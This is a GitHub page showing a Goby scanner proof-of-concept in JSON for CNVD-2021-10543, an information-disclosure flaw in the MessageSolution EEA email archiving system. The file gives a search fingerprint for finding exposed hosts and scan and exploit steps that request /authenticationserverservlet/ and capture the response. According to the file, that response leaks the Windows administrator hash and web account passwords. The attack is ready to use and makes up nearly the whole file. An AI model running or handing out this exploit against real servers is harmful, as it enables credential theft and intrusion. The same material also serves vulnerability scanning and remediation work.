-
Notifications
You must be signed in to change notification settings - Fork 8
/
MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543.json
70 lines (70 loc) · 2.54 KB
/
MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
{
"Name": "MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543",
"Level": "2",
"Tags": [
"账号密码泄露"
],
"GobyQuery": "title=\"MessageSolution Enterprise Email Archiving (EEA)\" ",
"Description": "MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码",
"Product": "MessageSolution企业邮件归档管理系统",
"Homepage": "PeiQi",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/authenticationserverservlet/",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "administrator",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/authenticationserverservlet/",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-03-22 14:21:12",
"GobyVersion": "1.8.237"
}